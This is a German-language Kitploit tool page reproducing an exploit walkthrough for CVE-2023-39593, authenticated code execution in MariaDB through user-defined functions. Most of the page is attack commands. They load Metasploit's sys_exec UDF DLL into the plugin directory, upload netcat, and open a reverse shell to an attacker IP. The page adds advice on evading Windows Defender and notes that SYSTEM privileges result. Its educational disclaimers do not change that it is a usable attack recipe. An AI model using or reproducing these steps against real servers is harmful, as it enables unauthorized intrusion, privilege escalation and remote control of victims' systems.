Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-39593 — Authentifizierte Codeausführung über die Datenbank | Kitploit
Tools/GitHubGitHub/ant1sec-ops/cve-2023-39593
Privilege EscalationExploitationPost-ExploitationPenetrationstestsCommand and ControlLernen & BildungRemote-Access-ToolPayload-EntwicklungDatenbanksicherheit
GitHubant1sec-ops/cve-2023-39593

CVE-2023-39593

Authentifizierte Codeausführung über die Datenbank

2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

MariaDB 10.5 Authentifizierte Codeausführung - sys_exec

Diese Anleitung enthält detaillierte Anweisungen zur Ausnutzung einer Schwachstelle in benutzerdefinierten Funktionen (UDF) in MariaDB auf einem entfernten Server. Die Schritte umfassen das Herunterladen und Ausführen von schädlichem Code auf einem anfälligen Datenbanksystem.

Warnung: Dieses Dokument dient nur zu Bildungszwecken. Die unbefugte Nutzung dieser Techniken ist illegal und unethisch.

Schritte zur Nachstellung des Angriffs

1. Verbindung zum entfernten MariaDB-Host herstellen

Verwenden Sie den folgenden Befehl, um eine Verbindung zum MySQL-Server herzustellen:

root@kitploit:~
mysql -h 192.168.214.129 -u root -pPassw0rd!

2. MariaDB-Version überprüfen

Um die laufende MySQL-Version zu ermitteln, führen Sie Folgendes aus:

root@kitploit:~
select @@version;

3. Alle Benutzer auflisten

Um den aktuell angemeldeten Benutzer anzuzeigen:

root@kitploit:~
select user();

4. Alle Informationen über den Root-Benutzer ausgeben

Rufen Sie alle Details zum Root-Benutzer ab:

root@kitploit:~
select * from mysql.user where user='root';

5. Benutzerberechtigungen überprüfen

Ermitteln Sie, welche Berechtigungen der aktuelle Benutzer hat:

root@kitploit:~
show grants;

6. Die Architektur des Systems überprüfen

Ermitteln Sie, ob die Systemarchitektur für UDF anfällig ist:

root@kitploit:~
select @@version_compile_os, @@version_compile_machine;

7. Das Plugin-Verzeichnis überprüfen

Identifizieren Sie das Plugin-Verzeichnis, in das UDF-Dateien hochgeladen werden können:

root@kitploit:~
select @@plugin_dir;

8. Die 32-Bit-DLL kopieren

Kopieren Sie die 32-Bit-DLL aus dem Exploit-Verzeichnis von Metasploit:

root@kitploit:~
ls /usr/share/metasploit-framework/data/exploits/mysql/
cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.dll udf.dll

9. Die DLL in das Base64-Format konvertieren

Kodieren Sie die Datei udf.dll im Base64-Format:

root@kitploit:~
cat udf.dll | base64 | tr -d '\n' > udf.base64

10. Übertragen der DLL auf den MySQL-Server

Kopieren Sie den Base64-Wert aus udf.base64 und übertragen Sie ihn in den MySQL-Server:

Öffnen Sie udf.base64 in einem Texteditor:

root@kitploit:~
leafpad udf.base64

Führen Sie in MariaDB Folgendes aus:

root@kitploit:~
select from_base64("base64 value") into dumpfile 'C:\\Program Files\\MariaDB 10.4\\lib\\plugin\\udf.dll';

Alternativ verwenden Sie bei Bedarf den folgenden Pfad:

root@kitploit:~
C:\Program Files\MariaDB 11.1\lib\plugin\

11. Die UDF-Funktion in MariaDB laden

Führen Sie den folgenden Befehl in MariaDB aus, um eine neue Funktion zu erstellen:

root@kitploit:~
create function sys_exec returns int soname 'udf.dll';

Hinweis: Sie können auch sys_eval, sys_get, do_system oder sys_bineval verwenden. Stellen Sie sicher, dass Sie int und nicht into verwenden.

12. Überprüfen der UDF-Installation

Überprüfen Sie, ob die UDF-Funktion erfolgreich installiert wurde:

root@kitploit:~
select * from mysql.func;

13. Die Netcat-Binärdatei vorbereiten

Kopieren Sie die Netcat-Ausführbare Datei in Ihr lokales Verzeichnis und kodieren Sie sie in Base64:

root@kitploit:~
cp /usr/share/windows-binaries/nc.exe .
cat nc.exe | base64 | tr -d '\n' > nc.base64

14. Netcat auf den MariaDB-Server übertragen

Öffnen Sie nc.base64 in einem Texteditor:

root@kitploit:~
leafpad nc.base64

Dann in MySQL:

root@kitploit:~
select from_base64("base64valueofNc.exe") into dumpfile 'C:\\Program Files\\MariaDB 10.5\\lib\\plugin\\nc.exe';

Alternativ können Sie es direkt mit folgendem Befehl hochladen:

root@kitploit:~
mysql -u root -p -h 192.168.214.129 < nc.base64

15. Netcat für eine Reverse Shell ausführen

Schalten Sie den Netcat-Listener auf Port 443 ein:

root@kitploit:~
sudo nc -nlvp 443

Führen Sie Netcat auf dem entfernten Server für eine Reverse Shell aus:

root@kitploit:~
select sys_exec('C:\\Program Files\\MariaDB 10.4\\lib\\plugin\\nc.exe 192.168.214.128 443 -e cmd.exe');

Hinweis: Dieser Schritt kann von Windows Defender oder anderen Antivirenprogrammen blockiert werden. Erwägen Sie die Verwendung von PowerShell-kodierten Befehlen (powershellbase64) und stellen Sie sicher, dass Defender deaktiviert ist.

16. PowerShell-Befehle ausführen

Führen Sie einen PowerShell-Befehl mit Base64-Kodierung aus:

root@kitploit:~
select sys_exec('powershellbase64');

HINWEIS: Sie erhalten in vielen Fällen NT AUTHORITY SYSTEM-Berechtigungen.

Zusätzliche Informationen

  • Drop Function: Um erstellte UDF-Funktionen zu entfernen:

    root@kitploit:~
    drop function sys_get;
    
  • Check Local Infile: Überprüfen, ob lokales Schreiben aktiviert ist:

    root@kitploit:~
    show variables like 'local_infile';
    
  • Find Users with Insert Privilege: Ermitteln, welche Benutzer die Einfügeberechtigung haben:

    root@kitploit:~
    use mysql;
    select user from user where insert_priv='Y' and Host='%';
    

Haftungsausschluss: Dieses Dokument dient ausschließlich zu Bildungszwecken und für Sicherheitsforschung. Der Missbrauch dieser Informationen kann zu Strafanzeigen und schwerwiegenden rechtlichen Konsequenzen führen. Holen Sie stets die Erlaubnis der zuständigen Behörden ein, bevor Sie Schwachstellen in einem Netzwerk oder System testen.

Tool herunterladen